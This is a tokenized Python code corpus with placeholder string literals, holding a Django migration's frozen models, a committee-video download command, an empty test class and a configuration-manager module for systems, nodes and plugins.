'<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:action>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:action>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import os , sys , traceback <EOL> from video . management . commands . sub_commands import SubCommand <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from committees . models import Committee <EOL> from video . models import Video <EOL> from video . utils import get_videos_queryset <EOL> class DownloadCommitteesVideos ( SubCommand ) : <EOL> def __init__ ( self , command , mms = None , mb_quota = None ) : <EOL> if mms is None : import video . utils . mms as mms <EOL> SubCommand . __init__ ( self , command ) <EOL> self . _verifyDataDir ( ) <EOL> videos = self . _getVideosToDownload ( ) <EOL> self . _debug ( '<STR_LIT>' + str ( len ( videos ) ) + '<STR_LIT>' ) <EOL> total_bytes = <NUM_LIT:0> <EOL> for video in videos : <EOL> if mb_quota is not None and ( total_bytes / <NUM_LIT> ) > mb_quota : <EOL> self . _warn ( '<STR_LIT>' + str ( mb_quota ) + '<STR_LIT>' ) <EOL> break <EOL> self . _check_timer ( ) <EOL> url = video . embed_link <EOL> self . _debug ( '<STR_LIT>' + url ) <EOL> filename = self . _get_data_root ( ) + '<STR_LIT>' + self . _getFilenameFromUrl ( url ) <EOL> if self . _isAlreadyDownloaded ( filename ) : <EOL> self . _debug ( "<STR_LIT>" + filename ) <EOL> total_bytes = total_bytes + self . _getFileSize ( filename ) <EOL> continue <EOL> else : <EOL> partfilename = filename + '<STR_LIT>' <EOL> try : <EOL> streamsize = mms . get_size ( url ) <EOL> except Exception , e : <EOL> self . _warn ( '<STR_LIT>' + str ( e ) ) <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> else : <EOL> self . _debug ( '<STR_LIT>' + str ( streamsize ) ) <EOL> mins_remaining = round ( self . _timer_remaining ( ) / <NUM_LIT> ) <EOL> downloaded = False <EOL> if self . _isAlreadyDownloaded ( partfilename ) : <EOL> filesize = self . _getFileSize ( partfilename ) <EOL> if filesize < streamsize : <EOL> self . _debug ( '<STR_LIT>' ) <EOL> try : <EOL> isDownloadDone = mms . resume_download ( url , partfilename , mins_remaining ) <EOL> downloaded = True <EOL> except Exception , e : <EOL> self . _warn ( '<STR_LIT>' + str ( e ) ) <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> else : <EOL> self . _debug ( '<STR_LIT>' ) <EOL> try : <EOL> isDownloadDone = mms . download ( url , partfilename , mins_remaining ) <EOL> downloaded = True <EOL> except Exception , e : <EOL> self . _warn ( '<STR_LIT>' + str ( e ) ) <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> if downloaded : <EOL> self . _check_timer ( ) <EOL> filesize = self . _getDownloadedFileSize ( partfilename ) <EOL> self . _debug ( '<STR_LIT>' + str ( filesize ) ) <EOL> if isDownloadDone : <EOL> self . _renameFile ( partfilename , filename ) <EOL> self . _debug ( "<STR_LIT>" + filename ) <EOL> total_bytes = total_bytes + filesize <EOL> def _verifyDataDir ( self ) : <EOL> if not os . path . exists ( self . _get_data_root ( ) + '<STR_LIT>' ) : <EOL> os . makedirs ( self . _get_data_root ( ) + '<STR_LIT>' ) <EOL> def _getFilenameFromUrl ( self , url ) : <EOL> filename = url . split ( '<STR_LIT:/>' ) <EOL> filename = filename [ len ( filename ) - <NUM_LIT:1> ] <EOL> return filename <EOL> def _getVideosToDownload ( self ) : <EOL> ret = [ ] <EOL> object_type = ContentType . objects . get_for_model ( Committee ) <EOL> videos = Video . objects . filter ( content_type__pk = object_type . id , group = '<STR_LIT>' ) . order_by ( '<STR_LIT:id>' ) <EOL> for video in videos : <EOL> qs = get_videos_queryset ( video , group = '<STR_LIT>' , ignoreHide = True ) <EOL> if qs . count ( ) == <NUM_LIT:0> : <EOL> ret . append ( video ) <EOL> return ret <EOL> def _isAlreadyDownloaded ( self , filename ) : <EOL> return os . path . exists ( filename ) <EOL> def _getFileSize ( self , filename ) : <EOL> return os . path . getsize ( filename ) <EOL> def _getDownloadedFileSize ( self , filename ) : <EOL> return self . _getFileSize ( filename ) <EOL> def _renameFile ( self , filename , newfilename ) : <EOL> os . rename ( filename , newfilename ) </s>
<s> from django . test import TestCase <EOL> class testMms ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testGetSize ( self ) : <EOL> pass <EOL> def testDownload ( self ) : <EOL> pass <EOL> def testResumeDownload ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from . import errors <EOL> from . import newconfig <EOL> from . import rcontrol_all <EOL> from . import util <EOL> from . import vc <EOL> from . util import json <EOL> import codecs <EOL> import imp <EOL> import os <EOL> import re <EOL> import shutil <EOL> import sys <EOL> NODE_CONF_FILE = "<STR_LIT>" <EOL> SYSTEM_CONF_FILE = "<STR_LIT>" <EOL> CONFIG_CONF_FILE = "<STR_LIT>" <EOL> REPO_CONF_FILE = "<STR_LIT>" <EOL> CONFIG_DIR = "<STR_LIT>" <EOL> PLUGIN_FILE = "<STR_LIT>" <EOL> SETTINGS_DIR = "<STR_LIT>" <EOL> DONT_SHOW = set ( [ "<STR_LIT>" ] ) <EOL> DONT_SAVE = set ( [ "<STR_LIT:index>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> g_plugin_module_cache = { } <EOL> g_plugin_cache = { } <EOL> g_cache_reset_counter = <NUM_LIT:0> <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> string_types = basestring <EOL> else : <EOL> string_types = str <EOL> def ensure_dir ( typename , root , name , must_exist ) : <EOL> """<STR_LIT>""" <EOL> target_dir = os . path . join ( root , name ) <EOL> exists = os . path . exists ( target_dir ) <EOL> if ( not must_exist ) and exists : <EOL> raise errors . UserError ( "<STR_LIT>" % ( typename , name ) ) <EOL> elif must_exist and ( not exists ) : <EOL> raise errors . UserError ( "<STR_LIT>" % ( typename , name ) ) <EOL> return target_dir <EOL> class ConfigMatch ( object ) : <EOL> def __init__ ( self , pattern , full_match = False ) : <EOL> if "<STR_LIT:$>" in pattern [ : - <NUM_LIT:1> ] : <EOL> raise errors . UserError ( "<STR_LIT>" % pattern ) <EOL> pattern = pattern . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> parts = pattern . rsplit ( "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> if len ( parts ) == <NUM_LIT:2> : <EOL> node_pattern , config_pattern = parts <EOL> else : <EOL> node_pattern = "<STR_LIT:.>" <EOL> config_pattern = parts [ <NUM_LIT:0> ] <EOL> if full_match : <EOL> if not config_pattern . endswith ( "<STR_LIT:$>" ) : <EOL> config_pattern += "<STR_LIT:$>" <EOL> self . match_config = re . compile ( config_pattern ) . match <EOL> if not node_pattern . endswith ( "<STR_LIT:$>" ) : <EOL> node_pattern += "<STR_LIT:$>" <EOL> self . match_node = re . compile ( node_pattern ) . match <EOL> else : <EOL> self . match_config = re . compile ( config_pattern ) . search <EOL> self . match_node = re . compile ( node_pattern ) . search <EOL> def matches ( self , node , conf ) : <EOL> if not self . match_node ( node . name ) : <EOL> return False <EOL> return self . match_config ( conf . name ) <EOL> class Item ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , typename , system , name , item_dir , conf_file , extra ) : <EOL> dict . __init__ ( self ) <EOL> assert isinstance ( system , ( System , type ( None ) ) ) <EOL> assert isinstance ( typename , string_types ) <EOL> assert isinstance ( name , string_types ) <EOL> assert isinstance ( item_dir , string_types ) <EOL> assert isinstance ( extra , ( dict , type ( None ) ) ) <EOL> self . type = typename <EOL> self . system = system <EOL> self . name = name <EOL> self . path = PathPyCompat ( item_dir ) <EOL> self . conf_file = conf_file <EOL> self . update ( extra or { } ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . name ) <EOL> def __eq__ ( self , other ) : <EOL> return self . name == other . name <EOL> def get_full_path ( self ) : <EOL> return self . name <EOL> full_path = property ( get_full_path , doc = "<STR_LIT>" ) <EOL> def showable ( self ) : <EOL> """<STR_LIT>""" <EOL> for k , v in sorted ( self . items ( ) ) : <EOL> if k not in DONT_SHOW : <EOL> yield k , v <EOL> def set_properties ( self , props ) : <EOL> """<STR_LIT>""" <EOL> changes = [ ] <EOL> for key_str , value in props . items ( ) : <EOL> old_value = util . set_dict_prop ( self , key_str . split ( "<STR_LIT:.>" ) , value ) <EOL> changes . append ( ( key_str , old_value , value ) ) <EOL> return changes <EOL> def log_update ( self , updates ) : <EOL> """<STR_LIT>""" <EOL> changes = [ ] <EOL> for key , value in updates . items ( ) : <EOL> old = self . get ( key ) <EOL> if old != value : <EOL> self [ key ] = value <EOL> changes . append ( ( key , old , value ) ) <EOL> return changes <EOL> def saveable ( self ) : <EOL> """<STR_LIT>""" <EOL> for k , v in sorted ( self . items ( ) ) : <EOL> if k not in DONT_SAVE : <EOL> yield k , v <EOL> def verify_enabled ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . get_tree_property ( "<STR_LIT>" , True ) <EOL> and not self . get_tree_property ( "<STR_LIT>" , False ) ) <EOL> def get_tree_property ( self , name , default = None ) : <EOL> """<STR_LIT>""" <EOL> value = self . get ( name ) <EOL> if value is not None : <EOL> return value <EOL> if self . system : <EOL> return self . system . get_tree_property ( name , default = default ) <EOL> return default <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT:U+002CU+0020>" . join ( ( "<STR_LIT>" % item ) for item in self . showable ( ) ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> util . json_dump ( dict ( self . saveable ( ) ) , self . conf_file ) <EOL> def cleanup ( self ) : <EOL> pass <EOL> class Config ( Item ) : <EOL> def __init__ ( self , node , name , config_dir , extra = None ) : <EOL> Item . __init__ ( self , "<STR_LIT>" , None , name , config_dir , <EOL> os . path . join ( config_dir , CONFIG_CONF_FILE ) , <EOL> extra ) <EOL> self . update ( json . load ( open ( self . conf_file ) ) ) <EOL> self . node = node <EOL> self . settings_dir = os . path . join ( self . path , SETTINGS_DIR ) <EOL> self . settings = newconfig . Config ( self . get_settings_dirs ( ) ) <EOL> self . controls = None <EOL> self . plugin = None <EOL> def get_full_path ( self ) : <EOL> return "<STR_LIT>" % ( self . node . name , self . name ) <EOL> full_path = property ( get_full_path , doc = "<STR_LIT>" ) <EOL> full_name = full_path <EOL> def __hash__ ( self ) : <EOL> return hash ( self . full_name ) <EOL> def __eq__ ( self , other ) : <EOL> return ( ( self . name == other . name ) and ( self . node . name == other . node . name ) ) <EOL> def get_plugin ( self ) : <EOL> if self . plugin : <EOL> return self . plugin <EOL> parent_config_name = self . get ( "<STR_LIT>" ) <EOL> if not parent_config_name : <EOL> return None <EOL> parent_conf_node , parent_config = self . node . confman . get_config ( <EOL> parent_config_name ) <EOL> return parent_config . get_plugin ( ) <EOL> def load_settings_layer ( self , file_name ) : <EOL> try : <EOL> return json . load ( open ( os . path . join ( self . settings_dir , file_name ) ) ) <EOL> except ( IOError , OSError ) : <EOL> return { } <EOL> def save_settings_layer ( self , file_name , layer ) : <EOL> if not os . path . exists ( self . settings_dir ) : <EOL> os . mkdir ( self . settings_dir ) <EOL> full_path = os . path . join ( self . settings_dir , file_name ) <EOL> util . json_dump ( layer , full_path ) <EOL> self . settings . reload ( ) <EOL> def get_settings_dirs ( self ) : <EOL> parent_config_name = self . get ( "<STR_LIT>" ) <EOL> if parent_config_name : <EOL> parent_config_node , parent_config = self . node . confman . get_config ( parent_config_name ) <EOL> for item in parent_config . get_settings_dirs ( ) : <EOL> yield item <EOL> yield self . full_name , self . settings_dir <EOL> def saveable ( self ) : <EOL> return self . items ( ) <EOL> def showable ( self ) : <EOL> dont_show = set ( [ "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT:path>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for k , v in sorted ( self . items ( ) ) : <EOL> if k not in dont_show : <EOL> yield k , v <EOL> def collect ( self , manager , node , top_config = None ) : <EOL> top_config = top_config or self <EOL> plugin_path = os . path . join ( self . path , PLUGIN_FILE ) <EOL> if not os . path . exists ( plugin_path ) : <EOL> return <EOL> plugin_key = ( manager , self , node , top_config ) <EOL> plugin = g_plugin_cache . get ( plugin_key ) <EOL> if plugin : <EOL> return plugin <EOL> cache_key = ( plugin_path , os . stat ( plugin_path ) . st_mtime ) <EOL> module = g_plugin_module_cache . get ( cache_key ) <EOL> if not module : <EOL> module = imp . load_source ( <EOL> "<STR_LIT>" % len ( g_plugin_module_cache ) , <EOL> plugin_path ) <EOL> g_plugin_module_cache [ cache_key ] = module <EOL> plugin = module . PlugIn ( manager , self , node , top_config ) <EOL> plugin . add_actions ( ) <EOL> plugin . add_all_controls ( ) <EOL> top_config . plugin = plugin <EOL> g_plugin_cache [ plugin_key ] = plugin <EOL> def collect_parents ( self , manager , node , top_config = None ) : <EOL> top_config = top_config or self <EOL> parent_name = self . get ( "<STR_LIT>" ) <EOL> if not parent_name : <EOL> return <EOL> matches = list ( self . node . confman . find_config ( parent_name , <EOL> full_match = True ) ) <EOL> if len ( matches ) == <NUM_LIT:0> : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> self . full_name , parent_name ) ) <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> names = ( c . full_name for pn , c in matches ) <EOL> raise errors . Error ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> self . full_name , parent_name , "<STR_LIT:U+002CU+0020>" . join ( names ) ) ) <EOL> parent_conf_node , parent_conf = matches [ <NUM_LIT:0> ] <EOL> parent_conf . collect ( manager , node , top_config = top_config ) <EOL> class Node ( Item ) : <EOL> def __init__ ( self , confman , system , name , item_dir , extra = None ) : <EOL> Item . __init__ ( self , "<STR_LIT>" , system , name , item_dir , <EOL> os . path . join ( item_dir , NODE_CONF_FILE ) , extra ) <EOL> self . confman = confman <EOL> self . _remotes = { } <EOL> self . config_cache = { } <EOL> self . update ( json . load ( open ( self . conf_file ) ) ) <EOL> def addr ( self , network = None ) : <EOL> """<STR_LIT>""" <EOL> network = network or "<STR_LIT>" <EOL> key = ( self . path , network ) <EOL> cached = self . confman . node_addr_cache . get ( key ) <EOL> if cached is not None : <EOL> return cached <EOL> if network == "<STR_LIT>" : <EOL> default = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> else : <EOL> default = [ "<STR_LIT>" . format ( network ) , "<STR_LIT>" ] <EOL> addr_map = self . get_tree_property ( "<STR_LIT>" , { } ) <EOL> addr_prop_list = addr_map . get ( network , addr_map . get ( "<STR_LIT:default>" , default ) ) <EOL> for addr_prop_name in addr_prop_list : <EOL> item = self <EOL> for part in addr_prop_name . split ( "<STR_LIT:.>" ) : <EOL> item = item . get ( part ) <EOL> if not isinstance ( item , ( dict , string_types , type ( None ) ) ) : <EOL> raise errors . InvalidProperty ( <EOL> "<STR_LIT>" % ( <EOL> self . name , type ( item ) , addr_prop_name ) ) <EOL> elif item is None : <EOL> break <EOL> if item is not None : <EOL> self . confman . node_addr_cache [ key ] = item <EOL> return item <EOL> raise errors . MissingProperty ( <EOL> "<STR_LIT>" % ( <EOL> self . name , network , <EOL> "<STR_LIT:U+002CU+0020>" . join ( repr ( a ) for a in addr_prop_list ) ) ) <EOL> def cleanup ( self ) : <EOL> for remote in self . _remotes . values ( ) : <EOL> remote . close ( ) <EOL> def get_remote ( self , override = None ) : <EOL> method = override or self . get_tree_property ( "<STR_LIT>" , None ) <EOL> remote = self . _remotes . get ( method ) <EOL> if not remote : <EOL> remote = rcontrol_all . get_remote ( self , method ) <EOL> self . _remotes [ method ] = remote <EOL> return remote <EOL> def add_config ( self , config , parent = None , copy_dir = None ) : <EOL> config_dir = os . path . join ( self . path , CONFIG_DIR , config ) <EOL> if os . path . exists ( config_dir ) : <EOL> raise errors . UserError ( <EOL> "<STR_LIT>" % ( self . name , config ) ) <EOL> if copy_dir : <EOL> try : <EOL> shutil . copytree ( copy_dir , config_dir , symlinks = True ) <EOL> except ( IOError , OSError ) as error : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> error . __class__ . __name__ , error ) ) <EOL> else : <EOL> os . makedirs ( config_dir ) <EOL> conf_file = os . path . join ( config_dir , CONFIG_CONF_FILE ) <EOL> conf = { } <EOL> if parent : <EOL> conf [ "<STR_LIT>" ] = parent <EOL> util . json_dump ( conf , conf_file ) <EOL> settings_dir = os . path . join ( config_dir , SETTINGS_DIR ) <EOL> if not os . path . exists ( settings_dir ) : <EOL> os . mkdir ( settings_dir ) <EOL> def remove_config ( self , config ) : <EOL> config_dir = os . path . join ( self . path , CONFIG_DIR , config ) <EOL> if not os . path . exists ( config_dir ) : <EOL> raise errors . UserError ( <EOL> "<STR_LIT>" % ( self . name , config ) ) <EOL> shutil . rmtree ( config_dir ) <EOL> def iter_configs ( self ) : <EOL> config_dir = os . path . join ( self . path , CONFIG_DIR ) <EOL> dirs = [ ] <EOL> if os . path . exists ( config_dir ) : <EOL> for dir_entry in os . listdir ( config_dir ) : <EOL> config_path = os . path . join ( config_dir , dir_entry ) <EOL> if os . path . isdir ( config_path ) : <EOL> dirs . append ( config_path ) <EOL> for config_path in dirs : <EOL> conf = self . config_cache . get ( config_path ) <EOL> if conf is None : <EOL> conf = Config ( self , os . path . basename ( config_path ) , config_path ) <EOL> self . config_cache [ config_path ] = conf <EOL> yield conf <EOL> def iter_all_configs ( self , handled = None ) : <EOL> handled = handled or set ( ) <EOL> for conf in self . iter_configs ( ) : <EOL> if conf . name not in handled : <EOL> handled . add ( conf . name ) <EOL> yield conf <EOL> parent_name = self . get ( "<STR_LIT>" ) <EOL> if parent_name : <EOL> parent_path = os . path . join ( self . confman . system_root , parent_name ) <EOL> parent_node = self . confman . get_node ( parent_path , self . system ) <EOL> for conf in parent_node . iter_all_configs ( handled = handled ) : <EOL> yield conf <EOL> def collect ( self , manager ) : <EOL> for conf in self . iter_configs ( ) : <EOL> conf . collect ( manager , self ) <EOL> def collect_parents ( self , manager , node = None ) : <EOL> node = node or self <EOL> parent_name = self . get ( "<STR_LIT>" ) <EOL> if parent_name : <EOL> parent_path = os . path . join ( self . confman . system_root , parent_name ) <EOL> parent_node = self . confman . get_node ( parent_path , self . system ) <EOL> for conf in parent_node . iter_configs ( ) : <EOL> conf . collect ( manager , node ) <EOL> parent_node . collect_parents ( manager , node ) <EOL> for conf in self . iter_configs ( ) : <EOL> conf . collect_parents ( manager , node ) <EOL> class System ( Item ) : <EOL> def __init__ ( self , system , name , system_path , sub_count , extra = None ) : <EOL> Item . __init__ ( self , "<STR_LIT>" , system , name , system_path , <EOL> os . path . join ( system_path , SYSTEM_CONF_FILE ) , extra ) <EOL> self [ "<STR_LIT>" ] = sub_count <EOL> try : <EOL> self . update ( json . load ( open ( self . conf_file ) ) ) <EOL> except IOError : <EOL> pass <EOL> class PathPyCompat ( str ) : <EOL> """<STR_LIT>""" <EOL> def __div__ ( self , other ) : <EOL> return os . path . join ( self , other ) <EOL> class ConfigMan ( object ) : <EOL> def __init__ ( self , root_dir , must_exist = True ) : <EOL> self . root_dir = PathPyCompat ( root_dir ) <EOL> self . system_root = os . path . join ( self . root_dir , "<STR_LIT>" ) <EOL> self . config_path = os . path . join ( self . root_dir , REPO_CONF_FILE ) <EOL> self . node_cache = { } <EOL> self . node_addr_cache = { } <EOL> self . find_cache = { } <EOL> self . find_config_cache = { } <EOL> self . _cache_reset_counter = g_cache_reset_counter <EOL> if must_exist : <EOL> conf = self . load_config ( ) <EOL> self . apply_library_paths ( conf . get ( "<STR_LIT>" , { } ) ) <EOL> self . vc = vc . create_vc ( self . root_dir ) <EOL> def dump_stats ( self ) : <EOL> return dict ( <EOL> node_cache = len ( self . node_cache ) , <EOL> find_cache = len ( self . find_cache ) , <EOL> find_config_cache = len ( self . find_config_cache ) , <EOL> ) <EOL> def reset_cache ( self ) : <EOL> self . node_cache = { } <EOL> self . node_addr_cache = { } <EOL> self . find_cache = { } <EOL> self . find_config_cache = { } <EOL> global g_cache_reset_counter <EOL> g_cache_reset_counter += <NUM_LIT:1> <EOL> self . _cache_reset_counter = g_cache_reset_counter <EOL> def apply_library_paths ( self , path_dict ) : <EOL> """<STR_LIT>""" <EOL> for lib_path in path_dict . values ( ) : <EOL> if not os . path . isabs ( lib_path ) : <EOL> lib_path = os . path . join ( self . root_dir , lib_path ) <EOL> if not lib_path in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , lib_path ) <EOL> def init_repo ( self ) : <EOL> if os . path . exists ( self . config_path ) : <EOL> raise errors . Error ( "<STR_LIT>" % ( <EOL> self . root_dir ) ) <EOL> try : <EOL> if not os . path . exists ( self . system_root ) : <EOL> os . makedirs ( self . system_root ) <EOL> util . json_dump ( { } , self . config_path ) <EOL> with open ( os . path . join ( self . root_dir , "<STR_LIT>" ) , "<STR_LIT:wb>" ) as f : <EOL> f . write ( codecs . decode ( codecs . decode ( b"""<STR_LIT>""" , "<STR_LIT>" ) , "<STR_LIT>" ) ) <EOL> except ( OSError , IOError ) as error : <EOL> raise errors . RepoError ( "<STR_LIT>" % ( <EOL> self . root_dir , error . __class__ . __name__ , error ) ) <EOL> def set_library_path ( self , name , lib_path ) : <EOL> conf = self . load_config ( ) <EOL> lib_path = str ( lib_path ) <EOL> libpath = conf . setdefault ( "<STR_LIT>" , { } ) <EOL> old_path = libpath . get ( name ) <EOL> libpath [ name ] = lib_path <EOL> sys_lib_path = lib_path if os . path . isabs ( lib_path ) else os . path . join ( self . root_dir , lib_path ) <EOL> if sys_lib_path not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , sys_lib_path ) <EOL> if old_path and old_path in sys . path : <EOL> sys . path . remove ( old_path ) <EOL> self . save_config ( conf ) <EOL> def load_config ( self ) : <EOL> try : <EOL> return dict ( json . load ( open ( self . config_path ) ) ) <EOL> except Exception as error : <EOL> raise errors . RepoError ( <EOL> "<STR_LIT>" % ( <EOL> self . root_dir , error . __class__ . __name__ , error ) ) <EOL> def save_config ( self , conf ) : <EOL> util . json_dump ( conf , self . config_path ) <EOL> def cleanup ( self ) : <EOL> for node in self . node_cache . values ( ) : <EOL> node . cleanup ( ) <EOL> def get_system_dir ( self , name , must_exist = True ) : <EOL> return ensure_dir ( "<STR_LIT>" , self . system_root , name , must_exist ) <EOL> def get_node_dir ( self , system , name , must_exist = True ) : <EOL> return ensure_dir ( "<STR_LIT>" , self . get_system_dir ( system ) , name , <EOL> must_exist ) <EOL> def create_system ( self , name ) : <EOL> system_dir = self . get_system_dir ( name , must_exist = False ) <EOL> os . makedirs ( system_dir ) <EOL> spec_file = os . path . join ( system_dir , SYSTEM_CONF_FILE ) <EOL> util . json_dump ( { } , spec_file ) <EOL> return system_dir <EOL> def system_exists ( self , name ) : <EOL> return os . path . exists ( os . path . join ( self . system_root , name ) ) <EOL> def create_node ( self , node , host = None , parent_node_name = None , <EOL> copy_props = None ) : <EOL> system_dir , node_name = os . path . split ( node ) <EOL> if not self . system_exists ( system_dir ) : <EOL> self . create_system ( system_dir ) <EOL> node_dir = self . get_node_dir ( system_dir , node_name , must_exist = False ) <EOL> os . makedirs ( node_dir ) <EOL> spec_file = os . path . join ( node_dir , NODE_CONF_FILE ) <EOL> if copy_props and parent_node_name : <EOL> parent_node_conf = os . path . join ( self . system_root , parent_node_name , <EOL> NODE_CONF_FILE ) <EOL> spec = json . load ( open ( parent_node_conf ) ) <EOL> else : <EOL> spec 